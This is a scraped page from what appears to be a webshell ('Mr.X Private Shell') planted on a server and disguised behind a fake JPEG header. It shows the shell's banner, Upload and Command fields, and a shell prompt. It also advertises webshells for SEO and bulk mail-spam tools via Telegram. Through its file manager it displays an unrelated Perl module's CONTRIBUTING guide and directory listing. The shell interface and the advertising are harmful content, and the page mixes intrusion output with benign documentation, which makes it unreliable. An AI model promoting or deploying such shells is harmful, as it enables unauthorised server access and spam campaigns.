����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
# CONTRIBUTING

Thank you for considering contributing to this distribution. This file
contains instructions that will help you work with the source code.

Please note that if you have any questions or difficulties, you can reach the
maintainer(s) through the bug queue described later in this document
(preferred), or by emailing the releaser directly. You are not required to
follow any of the steps in this document to submit a patch or bug report;
these are just recommendations, intended to help you (and help us help you
faster).

The distribution is managed with
[Dist::Zilla](https://metacpan.org/release/Dist-Zilla).

However, you can still compile and test the code with the
`Makefile.PL`
in the repository:

    perl Makefile.PL
    make
    make test


You may need to satisfy some dependencies. The easiest way to satisfy
dependencies is to install the last release. This is available at
https://metacpan.org/release/Data-Validate-IP

You can use [`cpanminus`](https://metacpan.org/pod/App::cpanminus) to do this
without downloading the tarball first:

    $> cpanm --reinstall --installdeps --with-recommends Data::Validate::IP

[`Dist::Zilla`](https://metacpan.org/pod/Dist::Zilla) is a very powerful
authoring tool, but requires a number of author-specific plugins. If you would
like to use it for contributing, install it from CPAN, then the following
command to install the needed distros:

    $> dzil authordeps --missing | cpanm

There may also be additional requirements not needed by the dzil build which
are needed for tests or other development:

    $> dzil listdeps --author --missing | cpanm

Or, you can use the 'dzil stale' command to install all requirements at once:

    $> cpanm Dist::Zilla::App::Command::stale
    $> dzil stale --all | cpanm

You can also do this via cpanm directly:

    $> cpanm --reinstall --installdeps --with-develop --with-recommends Data::Validate::IP

Once installed, here are some dzil commands you might try:

    $> dzil build
    $> dzil test
    $> dzil test --release
    $> dzil xtest
    $> dzil listdeps --json
    $> dzil build --notgz

You can learn more about Dist::Zilla at http://dzil.org/.

The code for this distribution is [hosted on GitHub](https://github.com/houseabsolute/Data-Validate-IP).

You can submit code changes by forking the repository, pushing your code
changes to your clone, and then submitting a pull request. Please update the
Changes file with a user-facing description of your changes as part of your
work. See the GitHub documentation for [detailed instructions on pull
requests](https://help.github.com/articles/creating-a-pull-request)

If you have found a bug, but do not have an accompanying patch to fix it, you
can submit an issue report [via the web](https://github.com/houseabsolute/Data-Validate-IP/issues).

## Continuous Integration

All pull requests for this distribution will be automatically tested using
[Azure Pipelines](https://dev.azure.com/houseabsolute/houseabsolute/_build).

All CI results will be visible in the pull request on GitHub. Follow the
appropriate links for details when tests fail. PRs cannot be merged until tests
pass.

## Precious

This distribution uses [precious](https://github.com/houseabsolute/precious)
to enforce a uniform coding style. This is tested as part of the author
testing suite. You can install this and any other necessary non-Perl tools by
running `./dev-bin/install-xt-tools.sh`.

Then you can use `precious` to tidy and lint your code:

    $> precious tidy -a
    $> precious lint -a

Please run `precious tidy -a` and `precious lint -a` before committing your
changes and address any issues that it reports.

You can also set up a git pre-commit hook that checks all changed files for
linting issues by running `./git/setup.pl`.

## Contributor Names

If you send a patch or pull request, your name and email address will be
included in the documentation as a contributor (using the attribution on the
commit or patch), unless you specifically request for it not to be. If you
wish to be listed under a different name or address, you should submit a pull
request to the `.mailmap` file to contain the correct mapping.

## Generated By

This file was generated via Dist::Zilla::Plugin::GenerateFile::FromShareDir 0.015 from a
template file originating in Dist-Zilla-PluginBundle-DROLSKY-1.22.

Filemanager

Name Type Size Permission Actions
bench Folder 0775
blib Folder 0755
dev-bin Folder 0775
git Folder 0775
lib Folder 0775
t Folder 0775
xt Folder 0775
CODE_OF_CONDUCT.md File 3.17 KB 0644
CONTRIBUTING.md File 4.25 KB 0644
Changes File 6.86 KB 0644
INSTALL File 2.39 KB 0644
LICENSE File 17.91 KB 0644
MANIFEST File 825 B 0644
META.json File 36.49 KB 0644
META.yml File 23.36 KB 0644
MYMETA.json File 36.58 KB 0644
MYMETA.yml File 23.35 KB 0644
Makefile File 30.5 KB 0644
Makefile.PL File 1.57 KB 0644
README.md File 9.61 KB 0644
azure-pipelines.yml File 668 B 0644
cpanfile File 1.61 KB 0644
dist.ini File 615 B 0644
perlcriticrc File 1.94 KB 0644
perltidyrc File 301 B 0644
pm_to_blib File 0 B 0644
precious.toml File 1.33 KB 0644